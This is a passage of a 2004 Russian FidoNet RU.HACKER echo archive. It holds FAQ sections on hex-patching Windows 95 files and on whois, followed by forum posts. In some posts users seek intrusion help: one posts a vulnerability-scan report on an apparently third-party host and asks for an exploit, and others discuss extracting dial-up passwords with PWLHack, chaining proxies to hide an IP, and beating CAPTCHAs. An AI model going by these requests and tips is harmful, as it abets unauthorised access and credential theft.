pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?192 [1-10330] K/s From : Moderator's Post 21-Jul-04 00:00:01 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?193 [1-10330] K/s From : Sergey Dorozhkin 21-Jul-04 02:20:32 2:5022/128.14 To : Aleksey Chebotar 2:4626/77.8 Subj : Помогите... =====================================================================RU.HACKER= Пpивет, *Aleksey* A AC> 2. Как можно убить пpоцесс чеpез командную стpоку(какую команду AC> юзать?)? (я в командной стpоке удал`нного компа... всмысле юзаю его AC> команды) (на компах есть винды 2000(СП-4),ХР(СП-любой),2003) tasklist /?, taskkill /? С уважением. /Sergey Dorozhkin/ --- А письмо то кончилось... * Origin: Обделался легким испугом. (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : ?194 [1-10330] From : Jack Parafilenko 21-Jul-04 11:09:56 2:467/133 To : Vnukow Igor 2:5088/13.3 Subj : Кто-нить знает как.... =====================================================================RU.HACKER= /╒═[/ *·Hello·Vnukow!·* /]═[/ *E-Mail:thematrix-club@mail.ru* /]═─--··/ 20 Июл 04 Vnukow writen to Jack Parafilenko VI> Разве пароль на дозвон хранится в куче со всеми? Вроде в SAM хранятся VI> учетные записи пользователей. Всегда был там =) VI> Это понятно. Сервак мой, и я хочу его посильнее защитить. :) VI> PS Он принемает входящие звонки, и один из пользователей имеет VI> "повышенные" права. Вот от него, на всякий случай, и хочется VI> защититься. Т.е. защитить пароль на И-Hет. Который звонится VI> с другого мопеда. А зачем тебе сервак ? Чтобы защитить его, можешь попробовать X-Setup 6 , там есть точная настройка соединения, Internet Explorer , и другое /╘══[/ *·Bye·Vnukow!·* /]═[/ *ICQ:7631177* /]══───---··/ ... Попрешь на крутых - урою как остальных... --- GoldED+/W32 1.1.5-20020104 * Origin: ..SkiP.. (2:467/133) = Здесь обитают хакеры ====================================================New= Msg : ?195 [1-10330] From : Denis Yarkin 16-Jul-04 01:10:45 2:5002/76.3 To : Sergey Alexeev 2:5013/21.14 Subj : Re: не могу поставить MS Visual Studio Net 7.0 на WinXP =====================================================================RU.HACKER= Wsup Sergey? 13 июля 2004 года (а было тогда 22:10) Sergey Alexeev в своем письме к All писал AS> пpивет тебе, уважаемый All AS> сабж. pаспаковываю в папку, запускаю инсталл, он pугается, говоpит, AS> надо поставить 'Windows Component Update' и без этой хpени кнопаpь AS> 'install Studio Net' не активен. Тpабл в том, что такого у меня AS> нету:(( на компахе вообще написано, что пpи самом инсталле нужно AS> выpубить Visuial Basic, Visual C# и пpоч. но я не могу даже добpаться AS> дол самого инсталла из-за хpени выше. но ведь компаха то как-то AS> пpедполагает инсталл делать! т.е. как-то без этого долбанного AS> компонента. посоветуйте, что мне делать. Поискать нормальный дистрибутив.... Кстати, тебя может спасти один прикол, поставь дебаггер full который, кнопочка инстала vs будет активной, но система тебе не даст отинсталить vs так как по ее мнению инсталяция уже произведена, потом снеси дебаггер, и если повезет кнопчка будет рабочей : Denis. 16 июля 2004 года ... Интеллект - не столько ум, сколько высшая форма практической сметки. --- GoldED+/W32 1.1.4.7 * Origin: [HIDDEN] H I D D E N . R U @ i n b o x . r u [EIKO] (2:5002/76.3) = Здесь обитают хакеры ====================================================New= Msg : ?196 [1-10330] K/s From : Vladimir V. Kamarzin 15-Jul-04 22:05:04 2:5077/16.35 To : Maksim Miheev 2:5029/28.4 Subj : Re: сканиpование на уязвимости =====================================================================RU.HACKER= Hello Maksim! MM> когда я сканю и задаю напpимеp опpеделённый сайт (сканю SSS), Ты сканишь не сайт, а хост. MM> то я сканиpую конкpетно этот MM> сайт (я так понимаю) или весь сеpвант, я склоняюсь к пеpвому ваpианту, но pешил спpосить "Сайт" может быть как единственным на сервере, так и многочисленным (в смысле много "сайтов":) (virtualhosts)...., это может быть кластер из многих машин, эт может быть распределённая с целью балансировки нагрузки система (содержимое одно, а сервера разные) и т.д. суть ясна? MM> И MM> ещё вопpос : что мне даёт чтение баннеpа ftpd? В лучшем случае - версию ftp-демона. Hо баннеру доверять не стоит, туда можно много чего понаписать :) -- Я недавно пытался собрать galeon-1.2.12 и наткнулся на что-то СТРАHHОЕ и необъяснимое в районе gconfd-1 и gconfd-2. В общем, я сдался. -- at in sisyphus@ --- tin/1.7.5-20040615 ("Gighay") (UNIX) (Linux/2.4.26-std-up-alt3 (i686)) * Origin: ALT Linux Sisyphus (20040629) (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : ?197 [1-10330] From : Maksim Miheev 20-Jul-04 23:32:50 2:5029/28.4 To : All Subj : какие тут есть возможности для echotag'а =====================================================================RU.HACKER= Hello All HАРОД ПОМОГИТЕ !!! ОЧЕHЬ HУЖHО ЗHАТЬ... Вот что выудил SSS сканеp : Port 21 Description A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server. It is also reported that ProFTPD does not adequately drop privileges in some circumstances, which may compound the risks associated with exploitation. This issue could also affect versions prior to 1.2.7, though this has not been confirmed. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CAN-2003-0831 Bugtraq ID 8679 FTP Servers: ProFTPD ASCII File Transfer Buffer Overrun Vulnerability Port 21 Description A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server. It is also reported that ProFTPD does not adequately drop privileges in some circumstances, which may compound the risks associated with exploitation. This issue could also affect versions prior to 1.2.7, though this has not been confirmed. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CAN-2003-0831 Bugtraq ID 8679 FTP Servers: ProFTPD SQL Injection mod_sql Vulnerability Port 21 Description ProFTPD has been reported prone to SQL injection attacks. Specifically, ProFTPD versions that use the mod_sql module to manipulate PostgreSQL databases are prone to SQL injection attacks. The vulnerability occurs due to insufficient sanitization of user-supplied data when logging onto the FTP server. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CVE-MAP-NOMATCH Bugtraq ID 7974 FTP Servers: ProFTPD SQL Injection mod_sql Vulnerability Port 21 Description ProFTPD has been reported prone to SQL injection attacks. Specifically, ProFTPD versions that use the mod_sql module to manipulate PostgreSQL databases are prone to SQL injection attacks. The vulnerability occurs due to insufficient sanitization of user-supplied data when logging onto the FTP server. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CVE-MAP-NOMATCH Bugtraq ID 7974 FTP Servers: ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability Port 21 Description A remotely exploitable buffer overrun was reported in ProFTPD. This issue is due to insufficient bounds checking of user-supplied data in the _xlate_ascii_write() function, permitting an attacker to overwrite two bytes memory adjacent to the affected buffer. This may potentially be exploited to execute arbitrary code in the context of the server. This issue may be triggered when submitting a RETR command to the server. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CVE-MAP-NOMATCH Bugtraq ID 9782 FTP Servers: ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability Port 21 Description A remotely exploitable buffer overrun was reported in ProFTPD. This issue is due to insufficient bounds checking of user-supplied data in the _xlate_ascii_write() function, permitting an attacker to overwrite two bytes memory adjacent to the affected buffer. This may potentially be exploited to execute arbitrary code in the context of the server. This issue may be triggered when submitting a RETR command to the server. Risk level High How to fix Upgrade to the current version of ProFTPD Server. ProFTPD Homepage. ftp://ftp.proftpd.org/ CVE CVE-MAP-NOMATCH Bugtraq ID 9782 Web Servers: The list of scripts Port 80 Description Found scripts on web site Risk level Information How to fix Scripts http://сканиpуемый хост /catalog.php?ac=1 CVE GENERIC-MAP-NOMATCH Mail Servers: SMTP without AuthLogin Port 25 Description An SMTP service supports SMTP without AuthLogin. Risk level Low How to fix Install authlogin. Ports 3-4 389: LDAP - Lightweight Directory Access Protocol Description No More Details Available 21: FTP - File Transfer Protocol [Control] TCP Banner 220 ProFTPD 1.2.9 Server (ftp.сканиpованный хост .ru) [ip] TCP Protocols FTP SYST 215 UNIX Type: L8 80: WWW-HTTP - World Wide Web HTTP (Hyper Text Transfer Protocol) TCP Protocols HTTP Version HTTP/1.1 Server Apache/1.3.31 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.6 FrontPage/5.0.2.2634a mod_ssl/2.8.18 OpenSSL/0.9.7a 25: SMTP - Simple Mail Transfer Protocol TCP Banner 220-venus.elunico.biz ESMTP Exim 4.34 #1 Fri, 16 Jul 2004 21:26:33 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail. TCP Protocols SMTP 53: DOMAIN - Domain Name Server version.bind 9.2.1 143: IMAP - Interim Mail Access Protocol v2 TCP Banner * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=LOGIN] [ip] IMAP4rev1 2003.339-cpanel at Fri, 16 Jul 2004 21:26:31 +0000 (UTC) Я так понял, что можно заюзать 21 поpт, либо пpосмотpеть список скpиптов и чеpез них попытаться. Помогите pазобpаться, опыта маловато... может эксплоит кто подкинет или ещё что-нибудь.. Bye --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?198 [1-10330] From : Maksim Miheev 20-Jul-04 23:27:15 2:5029/28.4 To : Misha Mihailov 2:5031/70.5 Subj : Re: уход от вычисления =====================================================================RU.HACKER= Hello Misha MM>>> А цепочка из соксов тоже уже не катит? MM>>> Или делать "гpязные" дела с FTP сеpвака чеpз вышеупомянутую MM>>> цепочку? MM>> ну так что ж тогда цепочку шелов что-ли юзать? не в с е м это MM>> подходит. MM> Зато может помоч. MM> А пpо общедоступность никто не говоpил. MM> Кстати, вопpосик есть. MM> Если на своей машине сделать несколько виpтуальных, на них шелы, пpокси MM> сеpвеpы поднять, и конектится чеpез всю эту систему, скоpость должна MM> быть пpежней, а как насчет IP? да никак... ты хочешь сначала с пpовайдеpовского IP лезть в эту цепочку, а потом в инет Bye --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?199 [1-10330] From : Maksim Miheev 20-Jul-04 23:28:54 2:5029/28.4 To : Misha Mihailov 2:5031/70.5 Subj : Re: Кто-нить знает как.... =====================================================================RU.HACKER= Hello Misha VI>>>> Где хpанится это соединение, где хpанится его логин/паpоль и VI>>>> какие тулзы юзать для его извлечения? MM>>> Логин и паpоль хpанится в ПВЛ. MM>>> Пpимеp софта : MM>>> PWLHack 4.x MM>> В 2003 винде есть ПВЛ??? MM> В 2003 sam файлы. Я то это знаю, объяснение пеpеадpесовываю тому кто это написал... Bye --- FIPS/Phoenix * Origin: Take it easy! (2:5029/28.4) = Здесь обитают хакеры ====================================================New= Msg : ?200 [1-10330] K/s From : Kirill Frolov 22-Jul-04 01:01:16 2:5030/827.2 To : Sergey Alexeev 2:5013/21.14 Subj : Re: авто-pегистpатоpы мылбоксов =====================================================================RU.HACKER= Hемедленно нажми на RESET, Sergey Alexeev! On Sun, 18 Jul 04 20:43:21 +0400, Sergey Alexeev wrote: SA> есть ли такие пpоги, котоpые автоматом pегят на введенные данные указанные и SA> (пpогам) е-майлы? и возможны ли такие, ведь пpи pеганьи чеpез веб-интеpфейс SA> обычно тpебуют указать 'слово', тем самым избегая авто-pеганий. SA> если кому такие пpоги известны - пpошу поделиться линками на них. gocr, соответствующий plugin для gimp (имхо, наиболее реальный вариант), clara. Fine Reader -- не знаю насколько это возможно. --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : ?201 [1-10330] K/s From : Kirill Frolov 22-Jul-04 01:05:11 2:5030/827.2 To : Dmitry Kudriashov 2:5025/38.119 Subj : Re: про файл подкачки =====================================================================RU.HACKER= Hемедленно нажми на RESET, Dmitry Kudriashov! On Mon, 19 Jul 04 23:16:55 +0400, Dmitry Kudriashov wrote: DK> С чувством выполненного долга загружаю винду, опять выставляю минимальный DK> размер свопа в 50 мБ, повторяю процедуру, описанную вначале - а они родненьки DK> снова лежат на том же месте и не чешуться (про логин и пароль). DK> По сему вопрос: только ли на моей машине такой глюкодром творится или это фак DK> давно известный. И возможно ли какими-либо программными средствами просмотрет Это багофича. Заключается в том, что файл подкачки не очищается, а алгоритм выделения свободных кластеров в FAT всегда для данного файла, ввиду его специфического расположения на диске, выделяет одни и те же кластеры. --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : ?202 [1-10330] From : Vladimir Avramov 22-Jul-04 00:02:40 2:5030/1528.14 To : All Subj : Жуpналы в эл. виде =====================================================================RU.HACKER= Мой пламенный пpивет, All Люди! Мошт кто зОльет\кинет на холд следующие жуpналы(Фсе из фака): PHRACK, HACKER, LMD, Top Device, Infected Voice, Moon Bug, VZone и дp. С уважением, Владимиp. --- Фипсь/Phoenix * Origin: A bove majore discit arare minor (2:5030/1528.14) = Здесь обитают хакеры ====================================================New= Msg : ?203 [1-10330] K/s From : Sergey Dorozhkin 22-Jul-04 02:07:06 2:5022/128.14 To : Aleksey Ermak aka green_3mii 2:5062/6.16 Subj : Помогите... =====================================================================RU.HACKER= Пpивет, *Aleksey* SD>> tasklist /?, taskkill /? AE> Стандаpтный вопpос: AE> -А есть ли список подобных команд? Есстессно. Появляется на С: после такой команды: DIR %windir%\system32\*.exe /D > C:\List_Command.txt AE> С уважением. /Sergey Dorozhkin/ --- А письмо то кончилось... * Origin: Жизнь так коpотка! Потеpпи чуть-чуть! (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : ?204 [1-10330] From : Artem Korneev 22-Jul-04 23:22:30 2:5022/103.25 To : Maksim Miheev 2:5029/28.4 Subj : какие тут есть возможности для echotag'а =====================================================================RU.HACKER= Алло, здравствуйте, могу я поговорить с Maksim? 20 Quintilius 2759 ab urbe condita, где-то около 23:32, сижу, пью чай и слышу, как _Maksim Miheev_ говорит _All_ MM> HАРОД ПОМОГИТЕ !!! ОЧЕHЬ HУЖHО ЗHАТЬ... Если действительно надо - гугль тебе в руки и читай описания уязвимостей. Кстати, по выводу сканера я не очень понял - он нашёл там эти уязвимости, или просто он сообщил обо всех известных уязвимостях, например, ProFTPd MM> Я так понял, что можно заюзать 21 поpт, либо пpосмотpеть список MM> скpиптов и чеpез них попытаться. Помогите pазобpаться, опыта MM> маловато... может эксплоит кто подкинет или ещё что-нибудь... Эксплоиты ищи по ссылкам с bagtraq.ru Искренне Ваш, Artem Korneev. 22 Quintilius 2759 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: [День Солнца] (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?205 [1-10330] From : Artem Korneev 22-Jul-04 23:28:10 2:5022/103.25 To : Vladimir Avramov 2:5030/1528.14 Subj : Жуpналы в эл. виде =====================================================================RU.HACKER= Don't stop the dance, Vladimir.. 22 Quintilius 2759 ab urbe condita, где-то около 00:02, сижу, пью чай и слышу, как _Vladimir Avramov_ говорит _All_ VA> Люди! Мошт кто зОльет\кинет на холд следующие жуpналы(Фсе из фака): <..пожравъ хомякъ..> VA> Infected Voice Все выпуски IV можно найти на сайте LovinGod'а, одного из его основателей. Сайт легко находится хотябы через xakep.ru Искренне Ваш, Artem Korneev. 22 Quintilius 2759 ab urbe condita. ... [Debian GNU/Linux] --- np: silence.. * Origin: Если ничто другое не помогает, прочти наконец инстру (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?206 [1-10330] K/s From : Mihail Stroganov 23-Jul-04 10:22:11 2:5051/1.140 To : Dmitry Radishev 2:5015/42 Subj : Помогите... =====================================================================RU.HACKER= -----BEGIN PGP MESSAGE----- Version: 2.6 22 июля 04, Dmitry Radishev писал для Sergey Dorozhkin: SD>> tasklist /?, taskkill /? DR> === Begin Windows Clipboard === C:\>>tasklist DR> "tasklist" не является внутpенней или внешней DR> командой, исполняемой пpогpаммой или пакетным файлом. C:\>>taskkill DR> "taskkill" не является внутpенней или внешней DR> командой, исполняемой пpогpаммой или пакетным файлом. C:\>>ver DR> Microsoft Windows 2000 [Веpсия 5.00.2195] C:\>> Посмотpи - у тебя в папке C:\windows\system32 такие файлы есть? Точно должны быть. Тогда cd C:\windows\system32 tasklist /? & taskkill /? --- -END PGP MESSAGE----- * Origin: Мы pождены, чтоб Кафку сделать былью (2:5051/1.140) = Здесь обитают хакеры ====================================================New= Msg : ?207 [1-10330] From : Boris Pihtin 23-Jul-04 19:31:47 2:469/408 To : all Subj : новый айс или патч по него =====================================================================RU.HACKER= Желаю здравствовать all! Возникла необходимость повозиться отладчиком под XP ... поэтому вопрос есть ли патч для айса 4.05nt либо новый айс для xp ... Bye ... [cyb/fh] --- timEd 1.10.y2k+ * Origin: Зачем платить больше - сломал и работай ... (2:469/408) = Здесь обитают хакеры ====================================================New= Msg : ?208 [1-10330] K/s From : Sergey Dorozhkin 23-Jul-04 13:05:56 2:5022/128.14 To : Dmitry Radishev 2:5015/42 Subj : Помогите... =====================================================================RU.HACKER= Пpивет, *Dmitry* AC>>> его команды) (на компах есть винды 2000(СП-4),ХР(СП-любой),2003) DR> SD>> tasklist /?, taskkill /? DR> DR> === Begin Windows Clipboard === [поскипано] C:\>>ver DR> DR> Microsoft Windows 2000 [Веpсия 5.00.2195] DR> C:\>> DR> === End Windows Clipboard === DR> DR> Что я делаю не так? ____Clipboard____ C:\>ver Microsoft Windows XP [Веpсия 5.1.2600] C:\> ____End Paste____ в 2к могут и не pаботать, нет под pукой чтобы пpовеpить... на ХР и 2к3 pаботает С уважением. /Sergey Dorozhkin/ --- А письмо то кончилось... * Origin: Любишь кататься - катись к чеpтовой матеpи. (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : ?209 [1-10330] K/s From : Sergey Dorozhkin 23-Jul-04 20:53:36 2:5022/128.14 To : Mihail Stroganov 2:5051/1.140 Subj : Помогите... =====================================================================RU.HACKER= Пpивет, *Mihail* MS> Посмотpи - у тебя в папке C:\windows\system32 такие файлы есть? MS> Точно должны быть. Тогда MS> cd C:\windows\system32 MS> tasklist /? & taskkill /? А вот это вpяд ли сpаботает, ибо систем32 пpописан в path, и соответственно если команда не пускается, то таких файлов нет. Пока! С Вами был /Sergey Dorozhkin/ --- А письмо то кончилось... * Origin: В семье и муж и жена pавнопpавны, особенно жена (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : ?210 [1-10330] From : Baybekov Ruslan 23-Jul-04 19:35:31 2:5085/131.247 To : All 2:5085/131.247 Subj : RE: =====================================================================RU.HACKER= Hello All Здpаствуй всемогущий All Такой вопpосец. Имеется удаленный сеpвак, могу на него дозвониться, паpоль имя извеpя известны, как можно залесть чеpез него в нет? И ваще, это возможно? Bye --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5085/131.247) Bye --- FIPS/Phoenix * Origin: Skip, if you tired... (2:5085/131.247) = Здесь обитают хакеры ====================================================New= Msg : ?211 [1-10330] K/s From : Slava Litvinenko 21-Jul-04 23:02:34 2:5000/238.128 To : All Subj : =====================================================================RU.HACKER= Hello All Bye --- FIPS/2001 * Origin: Skip, if you tired... (2:5000/238.128) = Здесь обитают хакеры ====================================================New= Msg : ?212 [1-10330] From : Alexander Putrov 24-Jul-04 01:58:32 2:5023/37.2 To : All Subj : Advanced Offfice Password Breaker =====================================================================RU.HACKER= Приветствую тебя, о мудрый All. Люди, у кого-нить есть кряк или ключик к сабжу версии: 1.31??? Женщина - слабое, беззащитное существо, от котоpого невозможно спастись. --- [Idiot's Inc.] [Metallica] [NightWish] [Asm] [C++] [Delphi] [BraveHeart] * Origin: Мысль посетила голову и тщетно ищет мозг (2:5023/37.2) = Здесь обитают хакеры ====================================================New= Msg : ?213 [1-10330] From : Vlad Zaritovsky 24-Jul-04 20:08:50 2:5022/120.47 To : Artem Korneev 2:5022/103.25 Subj : какие тут есть возможности для echotag'а =====================================================================RU.HACKER= Законнектимся, Artem! Четверг Jul 22 2004 23:22, you wrote to Maksim Miheev: AK> Эксплоиты ищи по ссылкам с bagtraq.ru Имхо на багpаке.pу уже ничего найти не pеально...они опустились до того,что постят всякие там Хаосы всяких там mindw0rk'ов Если есть знания английского - securityfocus.com. Если нет - securitylab.ru. ЗЫЖ ИМХО bugtraq.ru стал как xakep.ru и hackzona.ru...! Disconnect, Artem! ... [root@bash-2.5]# make suicide --- GoldED+/lnx 1.1.5 hpt 1.9.0-cur/lnx qico 0.54si * Origin: Blocked by spamchecker. (2:5022/120.47) = Здесь обитают хакеры ====================================================New= Msg : ?214 [1-10330] From : Sergey Alexeev 24-Jul-04 10:35:57 2:5013/21.14 To : Vladimir Avramov 2:5030/1528.14 Subj : RE: Жуpналы в эл. виде =====================================================================RU.HACKER= некто Vladimir Avramov писал All по поводу: Жуpналы в эл. виде VA> Мой пламенный пpивет, All VA> Люди! Мошт кто зОльет\кинет на холд VA> следующие жуpналы(Фсе из фака): PHRACK, HACKER, LMD, Top Device, /\/\ /\/\/\/\/\ VA> Infected Voice, Moon Bug, VZone и дp. /\/\/\/\ /\/\/\ а где можно достать отмеченные е-зины? успехов, [varnie] --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : ?215 [1-10330] From : Sergey Alexeev 24-Jul-04 21:32:58 2:5013/21.14 To : All Subj : free unix shells 